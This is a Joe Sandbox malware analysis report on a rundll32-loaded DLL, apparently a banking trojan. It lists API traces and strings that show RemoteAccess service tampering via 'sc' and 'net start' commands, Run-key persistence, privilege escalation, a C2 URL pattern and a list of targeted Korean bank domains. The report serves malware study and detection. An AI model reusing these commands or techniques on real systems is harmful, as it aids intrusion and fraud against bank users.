                                                          • Part of subcall function 10004DA0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10004E78
                                                          • Part of subcall function 10004DA0: time.MSVCRT(00000000), ref: 10004E7F
                                                          • Part of subcall function 10004DA0: _localtime32.MSVCRT(?), ref: 10004E8E
                                                          • Part of subcall function 10004DA0: strftime.MSVCRT ref: 10004EA1
                                                          • Part of subcall function 10004DA0: vsprintf.MSVCRT ref: 10004EF3
                                                          • Part of subcall function 10004DA0: sprintf.MSVCRT ref: 10004F13
                                                        Strings
                                                        Similarity
                                                        • API ID: File$CreateCurrentPointerProcess_localtime32sprintfstrftimetimevsprintf
                                                        • String ID: %s.%d$C:\Windows\6C4DA6FB\svchsot.exe$C:\Windows\6C4DA6FB\svchsot.vir$cmd.exe$self
                                                        APIs
                                                        • _CxxThrowException.MSVCRT(?,100147E8), ref: 10007FE5
                                                        • _CxxThrowException.MSVCRT(?,100147E8), ref: 1000801D
                                                        • lstrlen.KERNEL32(?,00000000), ref: 10008043
                                                        • WinExec.KERNEL32(sc stop RemoteAccess,00000000), ref: 1000806C
                                                        • WinExec.KERNEL32(sc config RemoteAccess start= auto,00000000), ref: 10008074
                                                        • WinExec.KERNEL32(net start RemoteAccess,00000000), ref: 1000807C
                                                        • RegCloseKey.ADVAPI32(?), ref: 10008082
                                                        Strings
                                                        • sc config RemoteAccess start= auto, xrefs: 1000806F
                                                        • sc stop RemoteAccess, xrefs: 10008067
                                                        • DLLPath, xrefs: 10007FFD, 1000804D
                                                        • U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFJlbW90ZUFjY2Vzc1xSb3V0ZXJNYW5hZ2Vyc1xJcA==, xrefs: 10007F86
                                                        • mp3, xrefs: 1000802E
                                                        • net start RemoteAccess, xrefs: 10008077
                                                        Similarity
                                                        • API ID: Exec$ExceptionThrow$Closelstrlen
                                                        • String ID: DLLPath$U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFJlbW90ZUFjY2Vzc1xSb3V0ZXJNYW5hZ2Vyc1xJcA==$mp3$net start RemoteAccess$sc config RemoteAccess start= auto$sc stop RemoteAccess
                                                        Strings
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID: JS0yNHMgJS0xNXMgJXMgXHJcbg==$JS0yNHMgJS0xNXMgMHgleCglZCkgXHJcbg==$JS0yNHMgJS0xNXMgXHJcbg==$REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$[%s]
                                                        APIs
                                                          • Part of subcall function 100060E0: strrchr.MSVCRT ref: 1000615E
                                                          • Part of subcall function 100060E0: strncpy.MSVCRT ref: 10006175
                                                          • Part of subcall function 100060E0: strncpy.MSVCRT ref: 1000617F
                                                          • Part of subcall function 100060E0: GetSystemInfo.KERNEL32(?), ref: 10006189
                                                          • Part of subcall function 100060E0: GetCurrentProcess.KERNEL32(00000020,?), ref: 100061AA
                                                          • Part of subcall function 100060E0: OpenProcessToken.ADVAPI32(00000000), ref: 100061B1
                                                          • Part of subcall function 100060E0: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 100061C2
                                                          • Part of subcall function 100060E0: AdjustTokenPrivileges.ADVAPI32 ref: 100061F7
                                                          • Part of subcall function 100060E0: CloseHandle.KERNEL32(00000010), ref: 10006202
                                                          • Part of subcall function 100060E0: sscanf.MSVCRT ref: 1000622D
                                                        • wsprintfA.USER32 ref: 100067A2
                                                          • Part of subcall function 10006240: strchr.MSVCRT ref: 10006296
                                                        • wsprintfA.USER32 ref: 10006808
                                                        • wsprintfA.USER32 ref: 10006821
                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 1000682C
                                                          • Part of subcall function 10005130: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,100094FF,?,?,?), ref: 10005149
                                                          • Part of subcall function 10005130: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000516B
                                                          • Part of subcall function 10005130: CloseHandle.KERNEL32(00000000), ref: 10005172
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 1000686A
                                                        • CreateThread.KERNEL32(00000000,00000000,10006630,00000000,00000000,00000000), ref: 10006891
                                                        Strings
                                                        Similarity
                                                        • API ID: CreateProcesswsprintf$CloseFileHandleOpenTokenstrncpy$AdjustCurrentDirectoryInfoLookupPrivilegePrivilegesSystemThreadValueWritesscanfstrchrstrrchr
                                                        • String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?), ref: 10011B0C
                                                        • GetLastError.KERNEL32 ref: 10011B18
                                                        • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 10011B4B
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 10011B5D
                                                        • LocalAlloc.KERNEL32(00000040,00000008), ref: 10011B71
                                                        • FreeLibrary.KERNEL32(00000000), ref: 10011B8E
                                                        • GetProcAddress.KERNEL32(?,?), ref: 10011BEF
                                                        • GetLastError.KERNEL32 ref: 10011BFB
                                                        • RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 10011C2D
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorExceptionLastLibraryRaise$AddressAllocExchangeFreeInterlockedLoadLocalProc
                                                        • String ID: $
                                                        APIs
                                                          • Part of subcall function 10007640: strstr.MSVCRT ref: 100076EB
                                                          • Part of subcall function 10007640: strstr.MSVCRT ref: 1000770F
                                                          • Part of subcall function 10007640: strcspn.MSVCRT ref: 1000771E
                                                          • Part of subcall function 10007640: strstr.MSVCRT ref: 1000772A
                                                          • Part of subcall function 10007640: strcspn.MSVCRT ref: 10007739
                                                          • Part of subcall function 10007640: strncpy.MSVCRT ref: 10007742
                                                          • Part of subcall function 10007640: strstr.MSVCRT ref: 1000777F
                                                          • Part of subcall function 10007640: strcspn.MSVCRT ref: 10007792
                                                          • Part of subcall function 10006BE0: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 10006BF7
                                                          • Part of subcall function 10006F70: RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,?), ref: 10006F9F
                                                          • Part of subcall function 10006F70: GlobalMemoryStatusEx.KERNEL32(?), ref: 10007059
                                                          • Part of subcall function 10006F70: GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?), ref: 100070B2
                                                        • send.WS2_32(00000000,?,00000128,00000000), ref: 10008B2F
                                                        • closesocket.WS2_32(00000000), ref: 10008B3B
                                                        • select.WS2_32 ref: 10008B91
                                                        • closesocket.WS2_32(00000000), ref: 10008C83
                                                        • InterlockedExchange.KERNEL32(1001B6B8,00000001), ref: 10008C94
                                                        Strings
                                                        Similarity
                                                        • API ID: strstr$strcspn$closesocket$DefaultExchangeGlobalInterlockedLanguageMemoryOpenStatusSystemselectsendsetsockoptstrncpy
                                                        • String ID: SeShutdownPrivilege$zip
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(urlmon.dll,00000001,00000001,?), ref: 100072B7
                                                        • LoadLibraryA.KERNEL32(wininet.dll), ref: 100072C0
                                                        • GetProcAddress.KERNEL32(00000000,URLDownloadToCacheFileA), ref: 100072E9
                                                        • GetProcAddress.KERNEL32(00000000,GetUrlCacheEntryInfoA), ref: 100072F4
                                                        Strings
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
                                                        APIs
                                                          • Part of subcall function 10004F60: GetCurrentProcess.KERNEL32(00000028,00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F6A
                                                          • Part of subcall function 10004F60: OpenProcessToken.ADVAPI32(00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F71
                                                          • Part of subcall function 10004F60: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10004F87
                                                          • Part of subcall function 10004F60: AdjustTokenPrivileges.KERNELBASE ref: 10004FCA
                                                          • Part of subcall function 10004F60: CloseHandle.KERNEL32 ref: 10004FD5
                                                        • CreateMutexA.KERNEL32(00000000,00000001,Global\98012trt8-d8dfsf,?,1000850C), ref: 100084AB
                                                        • GetLastError.KERNEL32(?,1000850C), ref: 100084B3
                                                        • ReleaseMutex.KERNEL32(00000000,?,?,?,1000850C), ref: 100084DD
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,1000850C), ref: 100084E4
                                                        Strings
                                                        Similarity
                                                        • API ID: CloseHandleMutexProcessToken$AdjustCreateCurrentErrorLastLookupOpenPrivilegePrivilegesReleaseValue
                                                        • String ID: ERROR_ALREADY_EXISTS$Global\98012trt8-d8dfsf$SeDebugPrivilege$c:\11.txt
                                                        APIs
                                                        • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FEC7,?), ref: 1000F87E
                                                        • GetFileSize.KERNEL32(?,00000000,?,00000000,?), ref: 1000F8EB
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FEC7), ref: 1000F90B
                                                        • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 1000F922
                                                        • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FEC7), ref: 1000F92B
                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F93C
                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 1000F95C
                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F96D
                                                        Similarity
                                                        • API ID: File$PointerRead$HandleInformationSize
                                                        • String ID:
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: strstr
                                                        • String ID: %s/joy.asp?sid=%s$%s|NULL|%s|%s$09161305$ECF4BB45F69D$NULL$http://
                                                        APIs
                                                          • Part of subcall function 10004B10: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004B1F
                                                          • Part of subcall function 10004C20: RegCreateKeyExA.KERNEL32(?,?,?,?,?,?,?,?,?,100090BE,80000001,00000000,?), ref: 10004C4D
                                                        • wsprintfA.USER32 ref: 100090E7
                                                          • Part of subcall function 10004CC0: RegSetValueExA.KERNEL32(?,?,?,?,?,?,10009112,?,EvtMgr,00000000,00000001,?), ref: 10004CDE
                                                          • Part of subcall function 10004C60: RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,76F90F00), ref: 10004C65
                                                        Strings
                                                        Similarity
                                                        • API ID: CloseCreateNamePathShortValuewsprintf
                                                        • String ID: %s "%s",QueryPluginInterface$EvtMgr$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$c:\ftelcs\rjqzr.dll$c:\windows\SysWOW64\rundll32.exe
                                                        APIs
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,753C8400,00000000,10010D59), ref: 1000FA95
                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,753C8400,00000000,10010D59), ref: 1000FAD6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: File$CreatePointer
                                                        • String ID:
                                                        APIs
                                                        • InterlockedDecrement.KERNEL32(?), ref: 1000A8E4
                                                        • InterlockedDecrement.KERNEL32(?), ref: 1000A918
                                                        • InterlockedIncrement.KERNEL32(?), ref: 1000A965
                                                        • InterlockedDecrement.KERNEL32(?), ref: 1000A977
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$Decrement$Increment
                                                        • String ID:
                                                        APIs
                                                        Strings
                                                        • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 10006261
                                                        • , xrefs: 100062E4
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: strchr
                                                        • String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
                                                        APIs
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,00000000), ref: 1000FEA9
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1000FED6
                                                        • GetLocalTime.KERNEL32(?), ref: 1000FF10
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 1000FF20
                                                          • Part of subcall function 1000F870: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FEC7,?), ref: 1000F87E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                        • String ID:
                                                        APIs
                                                        • wcslen.MSVCRT ref: 10011738
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000002,00000000,00000000,?,?,00000000,00000000,10005F05,00000000), ref: 10011764
                                                        • GetLastError.KERNEL32 ref: 10011774
                                                        • GetLastError.KERNEL32 ref: 1001177A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$ByteCharMultiWidewcslen
                                                        • String ID:
                                                        APIs
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1000509A,?,76F90F00), ref: 10004FFD
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000500C
                                                        • CloseHandle.KERNEL32(00000000), ref: 10005017
                                                        • CloseHandle.KERNEL32(00000000), ref: 10005024
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleProcess$OpenTerminate
                                                        • String ID:
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: strrchr
                                                        • String ID: 123
                                                        APIs
                                                        • lstrlen.KERNEL32(00000000,?,00000000,00000000,10009FCF,?,Win32_NetworkAdapterConfiguration), ref: 100116C2
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 100116E9
                                                        • GetLastError.KERNEL32(?,00000001), ref: 100116F9
                                                        • GetLastError.KERNEL32(?,00000001), ref: 100116FF
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$ByteCharMultiWidelstrlen
                                                        • String ID:

                                                        Execution Graph

                                                        Execution Coverage:15.1%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:42
                                                        Total number of Limit Nodes:3
                                                        execution_graph 332 3260fa4 VirtualProtect 333 3260fe3 VirtualProtect 332->333 334 3260fdf 332->334 334->333 335 3260063 336 3260067 335->336 337 32600c3 336->337 338 326006b VirtualAlloc 336->338 338->337 340 3260084 338->340 339 32600b5 VirtualFree 339->337 340->339 353 3260983 354 326098d LoadLibraryA 353->354 355 32609a5 354->355 355->354 356 32609ab GetProcAddress 355->356 357 32609c8 355->357 356->355 341 32607dd 342 326080d 341->342 343 326083b VirtualAlloc 342->343 346 326086a 343->346 344 326090c MessageBoxA ExitProcess 345 3260926 347 3260954 VirtualFree 345->347 346->344 346->345 348 32608ab 346->348 349 32608bb wsprintfA 348->349 351 32608cb wsprintfA 348->351 352 3260906 349->352 351->352 352->344 358 326002a 359 326002c 358->359 360 32600c3 359->360 366 3260047 359->366 363 3260056 VirtualFree 363->360 367 326004b 366->367 368 326003b 367->368 369 3260063 2 API calls 367->369 371 3260056 VirtualFree 367->371 368->363 372 3260063 368->372 369->371 371->368 373 3260067 372->373 374 32600c3 373->374 375 326006b VirtualAlloc 373->375 374->363 375->374 377 3260084 375->377 376 32600b5 VirtualFree 376->374 377->376 378 326102b GetProcAddress 379 3261009 LoadLibraryA

                                                        Callgraph

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,ABAD1000,00001000,00000040,03261100), ref: 0326085C
                                                        • wsprintfA.USER32 ref: 032608E1
                                                        • wsprintfA.USER32 ref: 03260900
                                                        • MessageBoxA.USER32(00000000,File corrupt.,Application error,00000010), ref: 03260918
                                                        • ExitProcess.KERNEL32(00000000), ref: 03260920
                                                        • VirtualFree.KERNELBASE(03270000,00000000,00008000,ED815D00), ref: 03260969
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1498275143.0000000003260000.00000040.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_3260000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Virtualwsprintf$AllocExitFreeMessageProcess
                                                        • String ID: Application error$File corrupt.$SWVU$The ordinal %d could not be located in the DLL %s.$The procedure %s could not be located in the DLL %s.

                                                        Control-flow Graph

                                                        control_flow_graph 31 3260fa4-3260fdd VirtualProtect 32 3260fe3-3260ffb VirtualProtect 31->32 33 3260fdf-3260fe1 31->33 33->32
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,00001000,00000004,?,?), ref: 03260FD3
                                                        • VirtualProtect.KERNEL32(?,00001000,?,?), ref: 03260FF1
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1498275143.0000000003260000.00000040.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_3260000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:

                                                        Control-flow Graph

                                                        control_flow_graph 34 3260063-3260069 36 32600c3-32600c5 34->36 37 326006b-3260082 VirtualAlloc 34->37 39 32600c6-32600ca 36->39 37->36 38 3260084-32600b0 call 3260390 37->38 42 32600b5-32600c1 VirtualFree 38->42 43 32600b2-32600b4 38->43 42->39 43->42
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0326007E
                                                        • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 032600BE
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1498275143.0000000003260000.00000040.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_3260000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocFree
                                                        • String ID:

                                                        Control-flow Graph

                                                        control_flow_graph 44 326002a-326002e 46 3260034-3260043 call 3260047 44->46 47 32600c3-32600c5 44->47 51 3260045-3260061 call 3260063 46->51 52 32600aa-32600b0 46->52 49 32600c6-32600ca 47->49 51->52 54 32600b5-32600c1 VirtualFree 52->54 55 32600b2-32600b4 52->55 54->49 55->54
                                                        APIs
                                                        • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 032600BE
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1498275143.0000000003260000.00000040.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_3260000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: FreeVirtual
                                                        • String ID: